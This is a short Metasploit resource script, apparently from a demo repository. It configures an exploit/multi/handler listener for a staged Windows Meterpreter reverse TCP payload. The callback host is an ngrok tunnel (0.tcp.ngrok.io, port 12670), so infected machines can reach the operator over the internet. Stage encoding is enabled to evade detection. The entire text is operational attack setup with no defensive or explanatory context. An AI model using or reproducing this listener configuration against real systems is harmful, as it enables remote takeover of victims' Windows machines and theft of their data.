#
# [Kali]: msfdb start; msfconsole -q -r '/root/github/demo/windows-meterpreter-staged-reverse-tcp-12670-exe.rc'
#
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 0.tcp.ngrok.io
set LPORT 12670
set ExitOnSession false
set EnableStageEncoding true
#set AutoRunScript 'post/windows/manage/migrate'
run -j
